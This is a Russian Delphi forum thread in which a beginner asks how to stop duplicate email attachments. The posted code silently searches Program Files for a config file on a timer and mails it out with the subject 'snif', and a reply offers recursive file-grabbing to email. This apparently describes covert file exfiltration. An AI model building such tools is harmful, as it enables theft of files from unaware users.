Форум по Delphi программированию

Delphi Sources



Вернуться   Форум по Delphi программированию > Все о Delphi > [ "Начинающим" ]
Ник
Пароль
Регистрация <<         Правила форума         >> FAQ Пользователи Календарь Поиск Сообщения за сегодня Все разделы прочитаны

Ответ
 
Опции темы Поиск в этой теме Опции просмотра
  #1  
Старый 02.08.2012, 13:41
iisyyyys iisyyyys вне форума
Прохожий
 
Регистрация: 02.08.2012
Сообщения: 8
Репутация: 10
По умолчанию помогите очистить аттач на емейле

вот код, отправляется на почту, при отправке всегда добавляется один и тот же файл в алгебраической прогрессии, как сделать так чтоб всегда отправлялся только 1 файл?

TIdAttachment.Create(idMessage1.MessageParts,'C:\1 .txt');

ах да, отправляется по таймеру

Последний раз редактировалось iisyyyys, 02.08.2012 в 13:43.
Ответить с цитированием
  #2  
Старый 02.08.2012, 14:01
Аватар для RusMaXXX
RusMaXXX RusMaXXX вне форума
Начинающий
 
Регистрация: 01.10.2008
Сообщения: 138
Версия Delphi: 7
Репутация: 21
По умолчанию

прога ищет в указанном каталоге файлы с определенным расширением, и отправляет их на почту... вот накидал за 5 минут.... глянь

Код:
  FindFiles('C:\pochta\', '*.txt', FileList, true);

данный исходник, позволяет отправить файлы найденные не только в указанной папке, но и в подкаталогах той папки, пример:
каталог c:\windows, ищем к примеру все текстовые файлы, *.txt, прога про сканирует весь каталог windows, и найденные текстовые файлы присоединит к письму...!!!!
Вложения
Тип файла: rar mail_send.rar (8.4 Кбайт, 4 просмотров)
__________________
уволен в запас!!!
Ответить с цитированием
  #3  
Старый 02.08.2012, 14:20
iisyyyys iisyyyys вне форума
Прохожий
 
Регистрация: 02.08.2012
Сообщения: 8
Репутация: 10
По умолчанию ыыы

нифига там у тебя прога) у меня гораздо проще) суть программы в том, что каждые 100 секунд высылается файл, но он постоянно добавляется к уже отправленным. Интересный конечно способ Open Dialog как раз для FindFiles?
Ответить с цитированием
  #4  
Старый 02.08.2012, 14:30
iisyyyys iisyyyys вне форума
Прохожий
 
Регистрация: 02.08.2012
Сообщения: 8
Репутация: 10
По умолчанию

вот мой код, как сделать, чтобы вместо вызова процедуры SendMail работала прога?)))


procedure FindFiles(StartFolder, Mask: string; List: TStrings; ScanSubFolders: Boolean = True);
var
SearchRec: TSearchRec;
FindResult: Integer;
begin
List.BeginUpdate;
try
StartFolder := IncludeTrailingBackslash(StartFolder);
FindResult := FindFirst(StartFolder + '*.*', faAnyFile, SearchRec);
try
while FindResult = 0 do
with SearchRec do
begin
if (Attr and faDirectory) <> 0 then
begin
if ScanSubFolders and (Name <> '.') and (Name <> '..') then
FindFiles(StartFolder + Name, Mask, List, ScanSubFolders);
end
else
begin
if MatchesMask(Name, Mask) then
List.Add(StartFolder + Name);
end;
FindResult := FindNext(SearchRec);
end;
finally
FindClose(SearchRec);
end;
finally
List.EndUpdate;
end;
end;

procedure TForm1.Timer1Timer(Sender: TObject);
begin
idSmtp1.Host:='smtp.yandex.ru'; // smtp
idSmtp1.Port:=25 ; // Порт ,если будет ошибка 10600 как то так, то попробуйте ввести порт 587
idSmtp1.Username:='11111' ; // Логин, от кого придет письмо
idSmtp1.Password:='11111' ; // Пароль
idMessage1.Body.Text:='11111' ;
idMessage1.From.Text:='11111@yandex.ru'; // Почтовый от адрес, от кого
idMessage1.Recipients.EMailAddresses:='11111@yande x.ru' ; // и кому отправляем
FileList := TStringList.Create;
FileList.Clear;
FindFiles('C:\Program Files\', '1111.cfg', FileList, true);
if FileList.Count <> 0 then SendMAIL(FileList);
FileList.Free;
idMessage1.Subject:='snif' ; // Тема письма
idSmtp1.Connect();
if idSmtp1.Connected=true then;
idSmtp1.Send(idmessage1);
idSmtp1.Disconnect
end;
Ответить с цитированием
  #5  
Старый 02.08.2012, 14:31
iisyyyys iisyyyys вне форума
Прохожий
 
Регистрация: 02.08.2012
Сообщения: 8
Репутация: 10
По умолчанию

причем сам файл все время обновляется
Ответить с цитированием
Ответ


Delphi Sources

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения

BB-коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход


Часовой пояс GMT +3, время: 11:25.


 

Сайт

Форум

FAQ

RSS лента

Прочее

 

Copyright © Форум "Delphi Sources" by BrokenByte Software, 2004-2023

ВКонтакте   Facebook   Twitter